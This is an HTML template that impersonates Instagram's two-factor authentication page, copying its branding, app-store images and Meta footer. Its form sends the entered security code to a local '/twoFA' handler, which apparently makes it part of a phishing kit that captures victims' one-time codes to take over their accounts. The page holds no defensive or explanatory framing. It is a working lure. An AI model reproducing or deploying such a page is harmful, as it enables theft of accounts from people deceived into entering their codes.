<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <link rel="shortcut icon" href="https://icones.pro/wp-content/uploads/2021/02/instagram-logo-icone4.png">
    <link rel="stylesheet" href="../static/style_for_2fa.css">
</head>

<body>
    <div class="container">
        <div class="box">
            <div class="heading"></div>
            <form class="login-form" action="/twoFA" method="post">

                <div class="first-text">{{params["method_message"]}}</div>
                <div class="field">
                    <input id="code" type="tel" name="code"  placeholder="Security Code" required="True" maxlength="8" autocomplete="off"  />
                    <label for="code">Security Code</label>
                </div>
                <button type="submit" class="login-button" title="login">Confirm</button>

                <p class="error-message" style="display:{{params["display_type"]}};">Please check the security code and try again.</p>

                <div class="separator">
                    <input type="checkbox" name="checkbox" id="checkbox" class="checkbox">
                    <div class="message" role="button">
                        <span style="color: rgb(0, 0, 0); font-weight:500;" >Trust this device</span>
                        <span style="color: black;">We won't ask for a code next time</span>
                    </div>
                </div>
                <div class="other">
                    <div class="last-message"><p style="display: inline;">{{params["backup_message"]}} <span class="hover-effect">backup codes.</span>
                    </div>
                </div>
            </form>
        </div>
       
        <div class="get">
           <p style="margin: 0; padding: 0;">Get the app.</p>
        </div>
        <br>
        <div class="apps">
            <a href="https://play.google.com/">
                <img src="https://static.cdninstagram.com/rsrc.php/v3/yz/r/c5Rp7Ym-Klz.png" height="40"
                    width="130"></a>&NonBreakingSpace;&NonBreakingSpace;&NonBreakingSpace;&NonBreakingSpace;&NonBreakingSpace;<a
                href="https://www.microsoft.com/">
                <img src="https://static.cdninstagram.com/rsrc.php/v3/yu/r/EHY6QnZYdNX.png" height="40" width="130"></a>
        </div>
        <br>
        <div class="footer">
            <footer style="color: rgb(144, 144, 144);">
                Meta
                About
                Blog
                Jobs
                Help
                API
                Privacy
                Terms
                Top Accounts
                Hashtags
                Locations
                Instagram Lite
                Contact Uploading & Non-Users
            </footer>
        </div>
        <div class="copyright" style="color: rgb(144, 144, 144);">
            <br>
            English © 2025 Instagram from Meta
        </div>


    </div>
      
</body>
<script>
    const inputElement = document.getElementById('code');
    
    inputElement.addEventListener('input', function() {
        this.value = this.value.replace(/\D/g, '');
    });
</script>
</html>